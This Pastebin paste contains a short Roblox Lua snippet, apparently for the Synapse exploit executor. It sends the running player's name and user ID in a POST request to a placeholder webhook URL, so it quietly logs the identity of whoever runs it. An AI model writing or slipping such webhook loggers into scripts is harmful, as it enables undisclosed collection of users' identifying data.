Advertisement
NukeVsCity

sus

Jul 20th, 2021
757
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.34 KB | None | 0 0
  1. local idiot = game:GetService("Players").LocalPlayer
  2. local response = syn.request(
  3.  
  4. {
  5. Url = 'webhookurlhere',
  6. Method = 'POST',
  7. Headers = {
  8. ['Content-Type'] = 'application/json'
  9. },
  10. Body = game:GetService('HttpService'):JSONEncode({content = idiot.Name .. idiot.UserId})
  11. }
  12. );
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement